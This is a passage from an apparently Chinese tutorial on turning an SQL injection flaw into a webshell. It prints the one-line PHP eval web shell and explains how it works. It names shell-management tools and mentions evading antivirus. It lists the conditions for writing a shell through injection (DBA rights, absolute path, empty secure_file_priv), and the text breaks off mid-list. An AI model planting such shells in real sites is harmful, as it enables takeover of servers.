通过注入漏洞拿到webshell
sql注入--12通过注入漏洞拿到webshell
获取webshell方法
简介
webshell:简单理解就是网站控制权限
一句话木马
一句话木马其实就是一句简单的代码。
先来看看php的一句话木马
<?php @eval($_POST['cmd']);?>
一句话木马短小精悍,而且功能很强大,隐蔽性很好,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀等webshell管理工具来连接。那么这一句话是什么意思呢。来简单的看看首先php代码格式<?php ? >,@表示后面即使执行错误,也不报错。Eval()函数表示括号内的语句字符串什么的全部当成代码执行,$_POST[‘cmd’]表示从页面以POST获取cmd这个值。
获取webshell条件
上传完一句话木马想要获取webshell那么想要满足三个条件:
(1)木马上传成功,未被杀(要做免杀)
(2)知道木马的路径在哪
(3)上传的木马能正常运行
Webshell管理工具:菜刀,蚁剑,冰蝎…等等,用来连接一句话木马的
webshell管理工具联合一句话木马一起使用
记得要改webshell管理工具密码
通过sql注入漏洞拿到webshell
获取webshell条件
想要通过sql注入获取对方服务器权限,需要满足以下条件:
(1)当前sql注入用户必须为DBA权限(–is-dba为true)
(2)需要知道网站的绝对路径
(3)My.ini文件中的这项配置secure_file_priv=” ”为空
DBA是数据库超级管理员权限
获取网站绝对路径的方法
1.单引号爆路径
2.错误参数值爆路径
3.通过搜索引擎获取
4.测试文件获取路径
5.配置文件获取路径
6.ngix文